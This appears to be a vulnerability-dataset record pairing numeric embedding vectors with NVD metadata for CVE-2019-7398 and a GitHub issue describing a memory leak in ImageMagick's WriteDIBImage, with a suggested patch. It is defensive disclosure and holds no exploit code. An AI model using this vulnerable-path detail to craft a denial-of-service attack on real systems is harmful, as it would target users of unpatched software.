-0.008170976303517818, 0.017078077420592308, -0.0005209099617786705, -0.014812450855970383, 0.02334330976009369, 0.02272169478237629, -0.00368470954708755, 0.021347597241401672, -0.0047071040607988834, 0.010240303352475166, 0.004923851694911718, -0.015802128240466118, 0.0010459095938131213, 0.012121508829295635, 0.01740524359047413, 0.0035906494595110416, -0.022983428090810776, -0.009013429284095764, 0.0012289180886000395, -0.0030160637106746435, -0.00808100588619709, 0.013250232674181461, 0.016112936660647392, 0.01748703420162201, 0.04321865737438202, -0.0003670396108645946, 0.003375946544110775, -0.03693706542253494, 0.012530466541647911, 0.012841274030506611, -0.01585938222706318, -0.0037256053183227777, -0.004457639995962381, 0.016579149290919304, 0.0018781386315822601, 0.014722480438649654, -0.01672637276351452, 0.022165512666106224, 0.0052223908714950085, -0.009864062070846558, -0.011516251601278782, -0.00009961955947801471, 0.0028218086808919907, 0.0017595408717170358, 0.00915247481316328, 0.015458604320883751, -0.026173299178481102, -0.01672637276351452, -0.010706515051424503, -0.005938067100942135, -0.003901457181200385, 0.0062406957149505615, -0.024848274886608124, 0.010338452644646168, -0.005733588244765997, 0.020480606704950333, -0.020055290311574936, 0.01727437600493431, 0.020611472427845, -0.013871847651898861, -0.03867104649543762, -0.006122097838670015, 0.0033943497110158205, 0.010084899142384529, -0.00427769822999835, 0.02445567585527897, -0.016382848843932152, 0.009684120304882526, 0.0025600758381187916, 0.001624584780074656, -0.0019773109816014767, 0.009013429284095764, 0.011426280252635479, -0.014550718478858471, -0.01922101527452469, -0.007851989939808846, 0.008342739194631577, -0.014877884648740292, 0.013266590423882008, -0.0018147501396015286, 0.03039374202489853, 0.00705043226480484, 0.021576613187789917, -0.01892656646668911, -0.023801343515515327, -0.014166297391057014, -0.02218187041580677, -0.005111972335726023, 0.010624723508954048, 0.013642831705510616, 0.012669512070715427, 0.0008342738728970289, -0.01567126251757145, -0.006220248062163591, 0.01768333464860916, 0.005312361754477024, -0.012628616765141487, 0.002954720053821802, -0.0022717604879289865, 0.001168596907518804, 0.00921790860593319, 0.000743280746974051, 0.024357525631785393, 0.0032532592304050922, -0.012644974514842033, -0.005447317846119404, -0.027514679357409477, -0.00035298167495056987, 0.013986356556415558, -0.002750241197645664, -0.0022369991056621075, -0.00617526238784194, -0.02630416490137577, 0.01248957123607397, 0.002977212658151984, -0.02771097980439663, -0.007295806892216206, 0.005553646944463253, -0.004535341635346413, -0.03392713889479637, 0.0035313505213707685, -0.007402135990560055, 0.021903779357671738, -0.01078012678772211, -0.0762951672077179, 0.012268733233213425, 0.013152082450687885, 0.004429013002663851, 0.0050056432373821735, -0.01715986803174019, 0.01784691773355007, 0.012522287666797638, 0.001395568484440446, -0.013798235915601254, -0.012129687704145908, -0.02543717436492443, 0.016121115535497665, 0.006645563989877701, 0.0011369026033207774, 0.0031776020769029856, -0.016505535691976547, 0.02478284202516079, 0.009046146646142006, 0.003545664018020034, 0.0007044298108667135, -0.0193845983594656, -0.010223944671452045, -0.009340595453977585, 0.009954032488167286, 0.014918779954314232, 0.01724166050553322, -0.011205443181097507, 0.002265626098960638, -0.006167083512991667, -0.0007969564758241177, 0.020513322204351425, -0.000800534849986434, 0.007005447056144476, -0.01640738546848297, -0.015262304805219173, -0.014035431668162346, 0.0014272626722231507, 0.014272626489400864, -0.027073005214333534, -0.014174477197229862, 0.005504571832716465, 0.015679441392421722, -0.0007964452961459756, -0.009806808084249496, -0.012587720528244972, 0.003273707116022706, 0.023163368925452232, -0.01735616847872734, 0.013888206332921982, -0.008588113822042942, 0.009340595453977585, 0.013405635952949524, -0.014346239157021046, -0.011229980736970901, 0.013037574477493763, -0.012178762815892696, -0.012383242137730122, -0.012849453836679459, -0.022132795304059982, -0.0004874265578109771, -0.0062529644928872585, 0.020611472427845, -0.008817129768431187, -0.005267376080155373, 0.015180513262748718, -0.00008517823880538344, 0.020758697763085365, 0.024422958493232727, -0.009495999664068222, 0.001188022317364812, 0.006052575074136257, 0.0018127054208889604, -0.0023535520303994417, -0.009896778501570225, -0.0029935711063444614, -0.01626834087073803, 0.0028688388410955667, 0.004379937890917063, 0.01513143815100193, 0.008465426042675972, 0.004535341635346413, 0.011859775520861149, 0.005140599329024553, -0.008907100185751915, -0.0024210300762206316, 0.015883920714259148, 0.006890938617289066, 0.012882170267403126, 0.00691547617316246, 0.020644189789891243, 0.0018791609909385443, 0.007259000558406115, 0.02057875506579876, 0.015483141876757145, -0.012375062331557274, -0.005844006780534983, -0.001900631352327764, 0.0053082718513906, -0.0004948389250785112, 0.01202335860580206, -0.009234266355633736, 0.003694933606311679, 0.030540967360138893, -0.004776626825332642, -0.00034403573954477906, -0.0013863669009879231, -0.02424301765859127, 0.009005250409245491, -0.022525394335389137, 0.00545140728354454, 0.0017350034322589636, 0.0028933763969689608, 0.008371366187930107, 0.004408564884215593, -0.008858026005327702, 0.016832701861858368, 0.012661333195865154, -0.02844710275530815, -0.013569219037890434, -0.026173299178481102, 0.0069727301597595215, -0.018779341131448746, -0.0045517003163695335, 0.004559879191219807, -0.002324925037100911, -0.010690156370401382, -0.005034270230680704, -0.006555593106895685, -0.0012677691411226988, 0.023474177345633507, 0.011041860096156597, 0.0015315469354391098, 0.02098771370947361, 0.02250903658568859, -0.008980712853372097, 0.024193942546844482, -0.0085553964599967, 0.014256268739700317, 0.005582273937761784, -0.023605043068528175, -0.01941731572151184, 0.0193845983594656, -0.02250903658568859, -0.02057875506579876, 0.0047071040607988834, -0.011360847391188145, 0.011229980736970901, 0.011303593404591084, 0.0014313522260636091, 0.01637466996908188, 0.00794604979455471, -0.021380312740802765, 0.006105739623308182, -0.0069727301597595215, 0.006355204153805971, 0.008383634500205517, 0.011745267547667027, -0.014190834946930408, 0.004633491858839989, 0.006383831147104502, 0.0033125581685453653, -0.002964943880215287, 0.029248660430312157, -0.011000964790582657, 0.009864062070846558, -0.011000964790582657, 0.01230962947010994, -0.012579541653394699, 0.010313915088772774, 0.008849846199154854, 0.0060157692059874535, -0.02008800581097603, 0.005545467603951693, 0.013250232674181461, 0.009463283233344555, -0.016636403277516365, -0.012227837927639484, 0.023719551041722298, -0.018239516764879227, -0.00425725057721138, 0.009373312816023827, 0.0035436192993074656, 0.006805057637393475, 0.0024292091839015484, -0.02811993658542633, 0.016440102830529213, -0.00585627555847168, 0.005582273937761784, 0.010207585990428925, 0.028299879282712936, 0.03409072011709213, 0.008579934015870094, -0.026827631518244743, 0.00295267510227859, 0.010281198658049107, -0.009455104358494282, 0.006400189362466335, -0.01603114604949951, -0.01822315901517868, 0.011884313076734543, 0.009774090722203255, 0.017078077420592308, 0.02841438725590706, -0.0028565700631588697, -0.016415566205978394, 0.008416350930929184, -0.010763769038021564, -0.004347221460193396, -0.0030365115962922573, 0.005827648565173149, -0.00867808423936367, 0.0047807167284190655, 0.010256661102175713, 0.002140894066542387, -0.022410886362195015, -0.0027420618571341038, 0.0019507285906001925, -0.0036642616614699364, 0.002474194625392556, 0.027972713112831116, 0.013389278203248978, 0.025878848508000374, -0.00721401534974575, -0.007279448676854372, 0.0060280379839241505, 0.021265804767608643, 0.010542931966483593, 0.012653154321014881, 0.011467176489531994, -0.007635241840034723, 0.005435049068182707, 0.015589470975100994, -0.0004659562837332487, 0.0021797448862344027, 0.0016910404665395617, -0.003686754498630762, -0.01781420037150383, 0.014926958829164505, 0.0065187872387468815, 0.026418672874569893, -0.0027441068086773157, -0.008375455625355244, -0.014624330215156078, -0.022754410281777382, 0.01789599284529686, 0.015025109052658081, 0.00046391147770918906, 0.009414208121597767, -0.017208943143486977, 0.00008479483949486166, -0.00748392753303051, -0.009937673807144165, 0.01616201177239418, 0.0012401645071804523, -0.017094435170292854, -0.007688406389206648, -0.0019497062312439084, 0.002333104144781828, 0.0034965891391038895, 0.004588506184518337, -0.013945460319519043, 0.01567126251757145, 0.014452568255364895, -0.011491714045405388, -0.012424137443304062, 0.004666208289563656, -0.016448281705379486, -0.015474963001906872, 0.007144492585211992, 0.0012268733698874712, -0.007115865591913462, -0.0117534464225173, 0.008089184761047363, -0.011041860096156597, 0.011123651638627052, -0.020611472427845, 0.003396394429728389, -0.016996284946799278, -0.012481391429901123, -0.02102043107151985, -0.0367080494761467, -0.010101256892085075, 0.0017554513178765774, 0.010354811325669289, 0.0077824667096138, -0.024521108716726303, -0.005398242734372616, 0.0013240008847787976, -0.003940308466553688, 0.0029813023284077644, -0.007721122819930315, -0.0011737088207155466, -0.006567861884832382, -0.022688977420330048, 0.00198957952670753, 0.013601936399936676, 0.017961425706744194, 0.01760154217481613, 0.011777983978390694, 0.0011808655690401793, 0.0011144099989905953, -0.01819044165313244, -0.005304182413965464, -0.0026111954357475042, -0.01602296531200409, 0.028218086808919907, -0.02136395499110222, -0.0009288453729823232, 0.001648099860176444, 0.015908457338809967, -0.0014170387294143438, 0.021952854469418526, 0.010861918330192566, -0.003602918004617095, 0.003040601033717394, 0.010812844149768353, -0.012734945863485336, -0.008473604917526245, -0.02247631922364235, 0.008596292696893215, 0.0012330077588558197, -0.025011857971549034, 0.005435049068182707, 0.0050547183491289616, 0.022787127643823624, 0.025502607226371765, -0.004400385543704033, 0.014591613784432411, 0.01616201177239418, 0.009790449403226376, 0.0005582273588515818, -0.022819845005869865, 0.0014262403128668666, -0.00487477658316493, -0.0008496097871102393, -0.00810963287949562, -0.005136509891599417, -0.0379185676574707, -0.013479248620569706, 0.0062038893811404705, -0.013242052868008614, 0.0032307663932442665, -0.015990249812602997, 0.005038360133767128, -0.011033681221306324, 0.011565325781702995, -0.006940013729035854, 0.011311772279441357, 0.00734897144138813, -0.030361026525497437, 0.010215765796601772, 0.01814136654138565, 0.025159083306789398, 0.012481391429901123, -0.008866204880177975, 0.017094435170292854, -0.016497356817126274, -0.00036934000672772527, 0.014550718478858471, -0.006441085133701563, -0.02548624947667122, 0.001819862169213593, -0.023964926600456238, -0.0208241306245327, 0.006817326415330172, 0.026614973321557045, 0.01835402473807335, 0.007353060878813267, -0.01024848222732544, -0.005357346963137388, -0.005897171329706907, 0.016227444633841515, 0.07688406109809875, 0.01613747514784336, -0.025011857971549034, 0.017536109313368797, -0.0006374629447236657, -0.022934352979063988, -0.013798235915601254, 0.05074348300695419, 0.009463283233344555, 0.0099949287250638, 0.02210007794201374, 0.0014589568600058556, -0.0034270661417394876, -0.014730659313499928, 0.0057622152380645275, -0.00309172086417675, 0.01982627436518669, -0.006232516840100288, -0.0001373842533212155, 0.001589823397807777, -0.004670297726988792, -0.007851989939808846, -0.00286065973341465, 0.002001848304644227, 0.00018556459690444171, -0.006829595193266869, -0.007811093702912331, -0.030246518552303314, -0.01014215312898159, 0.012644974514842033, -0.008972533978521824, -0.005332809407263994, 0.003899412462487817, 0.009430566802620888, -0.023228801786899567, 0.00981498695909977, -0.008138259872794151, 0.03487591817975044, -0.013798235915601254, -0.007222194690257311, 0.00006447474879678339, 0.0010602230904623866, 0.01740524359047413, 0.007398046553134918, 0.01702900230884552, -0.01214604638516903, -0.006780520081520081, 0.00631021847948432, 0.004805253818631172, -0.012268733233213425, -0.005361436400562525, 0.00862083025276661, -0.008089184761047363, -0.008346828632056713, -0.0027052557561546564, -0.005177405662834644, 0.011041860096156597, 0.010044002905488014, 0.01294760312885046, -0.005332809407263994, 0.017307093366980553, -0.007586166728287935, 0.014550718478858471, 0.0003877430863212794, -0.010861918330192566, -0.006257053930312395, -0.008702621795237064, -0.007635241840034723, -0.001420105923898518, -0.010935530997812748, -0.0005633393302559853, -0.01751975156366825, 0.009569612331688404, -0.002915869001299143, 0.006392010021954775, -0.0028197639621794224, 0.02684398926794529, 0.00898889172822237, 0.0017022867687046528, -0.019400957971811295, 0.0033739018253982067, -0.006641474552452564, -0.03204593062400818, 0.022574469447135925, 0.0001840309996623546, 0.0008690353133715689, -0.007557539734989405, 0.011941567063331604, -0.016710015013813972, 0.007508465088903904, 0.0005111972568556666, -0.013912743888795376, -0.012833095155656338, -0.016963569447398186, -0.018615758046507835, -0.020055290311574936, 0.019482748582959175, -0.011933388188481331, 0.02226366102695465, -0.007308075670152903, -0.014362597838044167, -0.0004281276778783649, 0.007144492585211992, 0.004081398714333773, -0.0047071040607988834, 0.020153440535068512, 0.007201746571809053, 0.0099949287250638, 0.008898921310901642, -0.030295593664050102, 0.0004393740091472864, 0.005553646944463253, 0.004764358047395945, 0.020022572949528694, 0.01057564839720726, -0.010215765796601772, 0.003836024086922407, 0.010657439939677715, 0.006670101545751095, -0.0033125581685453653, 0.019237374886870384, 0.0214457456022501, 0.007680227048695087, -0.005046539008617401, 0.013487427495419979, 0.003584515070542693, 0.0033452745992690325, 0.006379741244018078, 0.000584298453759402, 0.043643973767757416, 0.024422958493232727, 0.0014926958829164505, -0.007115865591913462, -0.004813433159142733, 0.03611915186047554, 0.0007805982022546232, 0.013912743888795376, 0.006698728539049625, -0.005639527924358845, 0.01830494962632656, 0.01694720983505249, -0.0017789663979783654, 0.0135037861764431, -0.004723462276160717, 0.03294564038515091, 0.01689813658595085, -0.009954032488167286, 0.006257053930312395, 0.005226480308920145, -0.010804664343595505, -0.0053082718513906, -0.02218187041580677, 0.023277876898646355, -0.0034393349196761847, 0.026713121682405472, -0.022525394335389137, -0.030115650966763496, 0.00030058398260734975, 0.033338237553834915, 0.009136117063462734, -0.0052960035391151905, 0.0010571558959782124, 0.004666208289563656, 0.012669512070715427, 0.013013036921620369, -0.014689764007925987, -0.0037276502698659897, -0.007843810133635998, 0.0042654299177229404, 0.0032164528965950012, 0.016505535691976547, 0.007991035468876362, -0.005962604656815529, 0.002159297000616789, -0.007786556147038937, 0.00851450115442276, 0.0028790629003196955, -0.0199898574501276, -0.003582470118999481, -0.0045026252046227455, -0.002104087732732296, 0.007410314865410328, 0.017863275483250618, 0.0449526384472847, -0.01946639083325863, 0.010804664343595505, 0.007414404768496752, 0.012996678240597248, 0.0017554513178765774, -0.001007058541290462, 0.016440102830529213, 0.04635945335030556, -0.004568058531731367, -0.0006032127421349287, -0.0040486822836101055, 0.011655297130346298, -0.0008511433843523264, -0.002082617487758398, -0.010493856854736805, 0.004461729433387518, 0.009054325520992279, -0.0036335899494588375, 0.01572851650416851, 0.0049688369035720825, -0.008653546683490276, 0.04789713770151138, -0.004653939511626959, -0.01311118621379137, -0.02391585148870945, 0.002588702831417322, 0.010951889678835869 ]
3,029
CVE-2019-7398
2019-02-05T00:29:00.570000
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/106848" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1453" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4034-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "E982CE9C-89F7-4A5D-B036-A9A483493D5B", "versionEndExcluding": "6.9.10-25", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "2F7DF2A1-ADDE-48C4-BD39-CCA15D0D767A", "versionEndExcluding": "7.0.8-25", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1453
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> memory leak in WriteDIBImage in coders/dib.c ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> The critical code snippets are: https://github.com/ImageMagick/ImageMagick/blob/master/coders/dib.c#L1330 ```c if (dib_info.bits_per_pixel == 8) //line 1330 if (image_info->compression != NoCompression) //line 1331 { size_t length; /* Convert run-length encoded raster pixels. */ length=2UL*(bytes_per_line+2UL)+2UL; dib_data=(unsigned char *) AcquireQuantumMemory(length, // line 1340 (image->rows+2UL)*sizeof(*dib_data)); if (dib_data == (unsigned char *) NULL) { pixels=(unsigned char *) RelinquishMagickMemory(pixels); ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed"); } dib_info.image_size=(unsigned int) EncodeImage(image,bytes_per_line, pixels,dib_data); pixels=(unsigned char *) RelinquishMagickMemory(pixels); pixels=dib_data; // line 1350 dib_info.compression = BI_RLE8; } ``` and https://github.com/ImageMagick/ImageMagick/blob/master/coders/dib.c#L1367 ```c if (image->storage_class == PseudoClass) //line 1367 { if (dib_info.bits_per_pixel <= 8) //line 1369 { unsigned char *dib_colormap; /* Dump colormap to file. */ dib_colormap=(unsigned char *) AcquireQuantumMemory((size_t) (1UL << dib_info.bits_per_pixel),4*sizeof(*dib_colormap)); if (dib_colormap == (unsigned char *) NULL) // line 1379 ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed"); // line 1380 q=dib_colormap; ``` According to the code in function WriteDIBImage before line 1330, when **image->storage_class** is not **DirectClass** (i.e. storage class is **PseudoClass**) and **image_info->depth<=8**, **dib_info.bits_per_pixel** can be equal to **8** (at line 1151-1155), as a result, **dib_info.compression** will be BI_RGB (at line 1164-1165). **So the 4 conditions at line 1330, 1331, 1367 and 1369 can be satisfied at the same time in some setting.** When the 4 conditions are satisfied and **dib_data** is successfully allocated at line **1340**, **dib_data** will be assigned to **pixels** at line **1350**. However, when the allocation at line **1377** fails, the function don't free **dib_data** memory as done at line **1410** before returning with exception at line **1378**. As a result, a memory leak will happen. The size of leaked memory is 4*((image->columns*dib_info.bits_per_pixel+31)/32)*(image->rows+2UL)*sizeof(*dib_data) = (image->columns + 4) * (image->rows + 2) * sizeof(*dib_data), which may be a large value. (ps. dib_info.bits_per_pixel is 8) Patch Suggestion: ```c dib_colormap=(unsigned char *) AcquireQuantumMemory((size_t) // line 1377 (1UL << dib_info.bits_per_pixel),4*sizeof(*dib_colormap)); if (dib_colormap == (unsigned char *) NULL) { pixels=(unsigned char *) RelinquishMagickMemory(pixels); ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed"); } q=dib_colormap; ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: ImageMagick-4f0ea40e2a090e245f31d1f05247520d6e7eb4ca - Environment (Operating system, version and so on): Ubuntu 16.04 - Additional information: <!-- Thanks for reporting the issue to ImageMagick! --> Credit to Bingchang Liu at VARAS of IIE
Potential Memory Leak in WriteDIBImage in coders/dib.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1453/comments
2
2019-01-17T06:50:47
2019-02-12T01:46:59Z
https://github.com/ImageMagick/ImageMagick/issues/1453
400,133,504
1,453
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : Potential Memory Leak in WriteDIBImage in coders/dib.c Issue date: --- start body --- ### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> memory leak in WriteDIBImage in coders/dib.c ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> The critical code snippets are: https://github.com/ImageMagick/ImageMagick/blob/master/coders/dib.c#L1330 ```c if (dib_info.bits_per_pixel == 8) //line 1330 if (image_info->compression != NoCompression) //line 1331 { size_t length; /* Convert run-length encoded raster pixels. */ length=2UL*(bytes_per_line+2UL)+2UL; dib_data=(unsigned char *) AcquireQuantumMemory(length, // line 1340 (image->rows+2UL)*sizeof(*dib_data)); if (dib_data == (unsigned char *) NULL) { pixels=(unsigned char *) RelinquishMagickMemory(pixels); ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed"); } dib_info.image_size=(unsigned int) EncodeImage(image,bytes_per_line, pixels,dib_data); pixels=(unsigned char *) RelinquishMagickMemory(pixels); pixels=dib_data; // line 1350 dib_info.compression = BI_RLE8; } ``` and https://github.com/ImageMagick/ImageMagick/blob/master/coders/dib.c#L1367 ```c if (image->storage_class == PseudoClass) //line 1367 { if (dib_info.bits_per_pixel <= 8) //line 1369 { unsigned char *dib_colormap; /* Dump colormap to file. */ dib_colormap=(unsigned char *) AcquireQuantumMemory((size_t) (1UL << dib_info.bits_per_pixel),4*sizeof(*dib_colormap)); if (dib_colormap == (unsigned char *) NULL) // line 1379 ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed"); // line 1380 q=dib_colormap; ``` According to the code in function WriteDIBImage before line 1330, when **image->storage_class** is not **DirectClass** (i.e. storage class is **PseudoClass**) and **image_info->depth<=8**, **dib_info.bits_per_pixel** can be equal to **8** (at line 1151-1155), as a result, **dib_info.compression** will be BI_RGB (at line 1164-1165). **So the 4 conditions at line 1330, 1331, 1367 and 1369 can be satisfied at the same time in some setting.** When the 4 conditions are satisfied and **dib_data** is successfully allocated at line **1340**, **dib_data** will be assigned to **pixels** at line **1350**. However, when the allocation at line **1377** fails, the function don't free **dib_data** memory as done at line **1410** before returning with exception at line **1378**. As a result, a memory leak will happen. The size of leaked memory is 4*((image->columns*dib_info.bits_per_pixel+31)/32)*(image->rows+2UL)*sizeof(*dib_data) = (image->columns + 4) * (image->rows + 2) * sizeof(*dib_data), which may be a large value. (ps. dib_info.bits_per_pixel is 8) Patch Suggestion: ```c dib_colormap=(unsigned char *) AcquireQuantumMemory((size_t) // line 1377 (1UL << dib_info.bits_per_pixel),4*sizeof(*dib_colormap)); if (dib_colormap == (unsigned char *) NULL) { pixels=(unsigned char *) RelinquishMagickMemory(pixels); ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed"); } q=dib_colormap; ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: ImageMagick-4f0ea40e2a090e245f31d1f05247520d6e7eb4ca - Environment (Operating system, version and so on): Ubuntu 16.04 - Additional information: <!-- Thanks for reporting the issue to ImageMagick! --> Credit to Bingchang Liu at VARAS of IIE --- end body ---
4,507
[ -0.024950888007879257, 0.010667311027646065, -0.0038011115975677967, 0.029817385599017143, 0.028365502133965492, 0.04619140550494194, 0.0019072775030508637, 0.022746175527572632, -0.0005873070331290364, 0.04078717157244682, -0.011413417756557465, 0.00046967758680693805, 0.008852456696331501, -0.004389259032905102, -0.015527087263762951, 0.019949955865740776, -0.00510511826723814, 0.015070012770593166, -0.016105152666568756, -0.05380035191774368, 0.0035624918527901173, -0.0010863919742405415, -0.0023257022257894278, 0.023848531767725945, -0.007461068220436573, 0.013591242954134941, -0.0002682371705304831, -0.012945961207151413, 0.009443964809179306, 0.002342506544664502, 0.04506216198205948, 0.03680793568491936, 0.0044900840148329735, -0.02074311301112175, 0.02729003317654133, -0.018551845103502274, 0.025071877986192703, 0.05181073397397995, 0.01923745684325695, -0.008334887214004993, 0.009269201196730137, -0.07200266420841217, -0.032613605260849, 0.018592175096273422, -0.010095967911183834, 0.003915380220860243, -0.023915747180581093, -0.025999469682574272, -0.027491683140397072, 0.020810330286622047, 0.008603754453361034, -0.044873956590890884, -0.010848795995116234, -0.03463011234998703, 0.014612938277423382, 0.009007055312395096, 0.035732466727495193, 0.04385225847363472, 0.016132039949297905, 0.018215760588645935, -0.00902722030878067, 0.048718757927417755, 0.013275323435664177, 0.010492547415196896, 0.0070644887164235115, -0.011245375499129295, -0.04479329660534859, 0.016669774428009987, -0.0056092445738613605, 0.004043092485517263, -0.02542140521109104, -0.04344895854592323, 0.022746175527572632, 0.04465886205434799, 0.030704647302627563, 0.0017678026342764497, 0.05248289927840233, 0.02136150747537613, 0.0011275623692199588, 0.006257886998355389, -0.027666447684168816, 0.030032480135560036, -0.015500200912356377, 0.02989804558455944, 0.02992493286728859, 0.0028836019337177277, -0.024480368942022324, -0.055494215339422226, 0.012152803130447865, -0.022020233795046806, 0.002984427148476243, 0.005928524304181337, 0.026846401393413544, -0.05737628415226936, -0.005901637487113476, -0.012502330355346203, -0.03920085355639458, -0.03500652313232422, -0.048691872507333755, -0.011615067720413208, -0.01805444061756134, -0.03403860330581665, -0.028338614851236343, 0.010895848274230957, 0.007736657280474901, 0.005273160059005022, -0.019963398575782776, -0.048396117985248566, 0.020205378532409668, 0.1332506388425827, -0.0022652072366327047, 0.01687142439186573, -0.02394263446331024, 0.005679822061210871, 0.006140257231891155, 0.029198991134762764, 0.01021023653447628, -0.01661599986255169, -0.046352725476026535, -0.014303741045296192, -0.013611407950520515, -0.06329136341810226, -0.02136150747537613, 0.0207565575838089, 0.0010158143704757094, 0.034495677798986435, 0.0055689141154289246, -0.05068149045109749, -0.005636130925267935, 0.011628511361777782, -0.0063082994893193245, -0.039281513541936874, -0.0077164918184280396, -0.011823439970612526, -0.00778370862826705, 0.0004444712831173092, -0.006513310596346855, 0.036270201206207275, 0.005693265236914158, 0.0032532946206629276, -0.013080394826829433, -0.051676299422979355, 0.007608945015817881, 0.01245527807623148, 0.0007200603140518069, -0.00777698727324605, -0.04240037500858307, 0.019049249589443207, -0.003589378669857979, 0.01925089955329895, -0.0163068026304245, -0.014881806448101997, 0.005259716883301735, -0.0016468123067170382, 0.026483431458473206, 0.016642887145280838, 0.007024158723652363, 0.01288546621799469, -0.024735793471336365, -0.029414083808660507, -0.011789832264184952, -0.029091443866491318, 0.027343805879354477, 0.006708239670842886, -0.013308932073414326, -0.016400907188653946, -0.010465660132467747, 0.03901264816522598, -0.024198058992624283, 0.012999734841287136, 0.008650805801153183, -0.011191601864993572, 0.004036370664834976, -0.008980168029665947, -0.033931054174900055, 0.010358113795518875, -0.021388394758105278, 